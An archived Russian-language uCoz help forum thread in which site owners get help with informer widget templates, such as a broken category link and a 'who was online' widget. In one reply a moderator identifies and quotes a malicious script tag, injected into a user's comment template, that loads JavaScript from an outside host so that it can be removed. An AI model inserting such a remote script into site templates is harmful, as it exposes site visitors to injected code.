Архив - только для чтения
Сообщество uCoz » Архивариус » Архив » Архив темы: Информеры
Архив темы: Информеры
Leonora_
Сообщений: 130
Репутация: 6

Сообщение # 1516 | 15:15:31
Вывела информер на главную страницу последних пополнений файлов и статей с картинкой слево. Теперь в информере не работает категория. При неведении на нее выдает ошибку.
Код информера
Код
<div> <span style="font-size: 8pt; ">[$DATE$] <br> <span style="font-size: 11pt; ">Тема: <a href="http://trudolub-zosh.ucoz.ua/$ENTRY_URL$" style=" infTitle" colspan="2;">$TITLE$</a></span> </div><div><span style="font-size: 8pt; ">Категорія:<a href="http://trudolub-zosh.ucoz.ua/ $CATEGORY_URL$" style="text-align: -webkit-right; white-space: nowrap; ">$CATEGORY_NAME$</a></span></div><div><br></div>

Сайт http://trudolub-zosh.ucoz.ua/
Помогите исправить ошибку в коде. А может ошибка вовсе и не в этом.
Прикрепления: 0045521.jpg(217.5 Kb)
OXXXYMIRON
Сообщений: 108
Репутация: 33

Сообщение # 1517 | 17:31:59
http://trudolub-
zosh.ucoz.ua/ $CATEGORY_URL$ что это за ссылка такая?)) уберите адрес сайта и оставьте просто $CATEGORY_URL$

Добавлено (01 Фев 2014, 17:31:59)
---------------------------------------------
и в адресе темы также

Leonora_
Сообщений: 130
Репутация: 6

Сообщение # 1518 | 18:32:26
Цитата OXXXYMIRON ()
уберите адрес сайта и оставьте просто $CATEGORY_URL$
Не получается.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1519 | 19:01:43
Leonora_, ставьте так в шаблоне информера

Код
<div> <span style="font-size: 8pt; ">[$DATE$] <br> <span style="font-size: 11pt; ">Тема: <a href="http://trudolub-zosh.ucoz.ua/$ENTRY_URL$" style=" infTitle" colspan="2;">$TITLE$</a></span> </div><div><span style="font-size: 8pt; ">Категорія:<a href="$CATEGORY_URL$" style="text-align: -webkit-right; white-space: nowrap; ">$CATEGORY_NAME$</a></span></div><div><br></div>


далее удаляем вредоносный код с сайта

Код
<script src="http://am-investor.ru/higer.js" type="text/javascript"></script>
прописан в шаблоне информера комментарии

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Leonora_
Сообщений: 130
Репутация: 6

Сообщение # 1520 | 20:17:50
Цитата webanet ()
Leonora_, ставьте так в шаблоне информера
Все получилось. СПАСИБО!!!
Можно этот-же код ставить и в шаблон каталога статтей?
Прикрепления: 1526372.gif(22.1 Kb)
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1521 | 20:20:00
Leonora_, можно

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
kirana_ti
Сообщений: 2
Репутация: 0

Сообщение # 1522 | 22:52:58
Подскажите, пожалуйста, после обновления фотоальбома перекосило информер "Новые фото". Как вернуть его к нормальному размеру, так как было раньше? Сайт http://tasherittakemet.ucoz.ru/
[NS]PRIBALT©
Сообщений: 6
Репутация: 0

Сообщение # 1523 | 07:50:36
Добрый день, подскажите создал информер Кто был на сайте, но вот незадача, информер показывает только uID пользователей, локальных не учитывает, можно как то это поправить?
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1524 | 20:40:03
[NS]PRIBALT©, информер должен показывать всех пользователей
дайте адрес сайта

возможно из-за задержки вывода информации в информере вы не видите изменений. но по-любому информер показывает всех пользователей, которые авторизировались на сайте за текущие сутки

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
[NS]PRIBALT©
Сообщений: 6
Репутация: 0

Сообщение # 1525 | 11:24:47
Цитата webanet ()
[NS]PRIBALT©, информер должен показывать всех пользователей дайте адрес сайта

возможно из-за задержки вывода информации в информере вы не видите изменений. но по-любому информер показывает всех пользователей, которые авторизировались на сайте за текущие сутки
В том то и дело, что всех кто зарегистрирован в Укоз он кажет, а локального пользователя сайта нет) Вот http://nightswot.clan.su/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1526 | 15:15:24
[NS]PRIBALT©, вы что-то жестоко путаете. на вашем сайте нет возможности войти локальным пользователям. форма стоит только для uid пользователей.
дайте в общих настройках старую форму входа и авторизируйтесь по ней локальным юзером (созданным в панели управления) на сайт и через минут 20 смотрите результат что будет казать информер

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
[NS]PRIBALT©
Сообщений: 6
Репутация: 0

Сообщение # 1527 | 16:20:55
Ну да, проблема в том что человек который заходит на сайт, имеет права администратора и видимо перед входом меняет настройки. Тоесть я в его профиле вижу что он был на сайте, а информер молчит.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1528 | 16:26:16
[NS]PRIBALT©, вы о чем? какие настройки он меняет? вы пытались сделать то, что я сказала?
информер кешируется. он молчит 15+ минут после события, а потом он должен показать произошедшее

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Selena
Сообщений: 15657
Репутация: 1100

Сообщение # 1529 | 16:32:56
[NS]PRIBALT©, приведите нам здесь скриншот настроек модуля Пользователи. Опцию "Разрешенные методы авторизации пользователей".
А статистика онлайн срабатывает без кэша, надо только страницу обновить.



У вас пять администраторов, вы которого имеете в виду?
Прикрепления: 6518361.png(12.0 Kb)

Отправляя сообщение о помощи, приводите ссылку на свой сайт. Это не считается рекламой, зато снимает массу вопросов.
[NS]PRIBALT©
Сообщений: 6
Репутация: 0

Сообщение # 1530 | 17:00:54
Видимо я немножко криво обьяснил)
Правая панель, на сайт заходил. Там список всех кто был на сайте. так вот там его нету)
У человека есть права на администрирование сайта, то есть он может зайти в админ панель, поменять настройки логина, войти и сменить обратно. Его пользователь занесен через админку на сайте.
Простите Олаф. Ka jums iet? 6 лет не был на родине, а язык еще помню чуть, чуть. И да, за Стругацких спасибо)
Сообщение отредактировал [NS]PRIBALT© - Четверг, 06 Фев 2014, 17:07:04
Сообщество uCoz » Архивариус » Архив » Архив темы: Информеры
Поиск: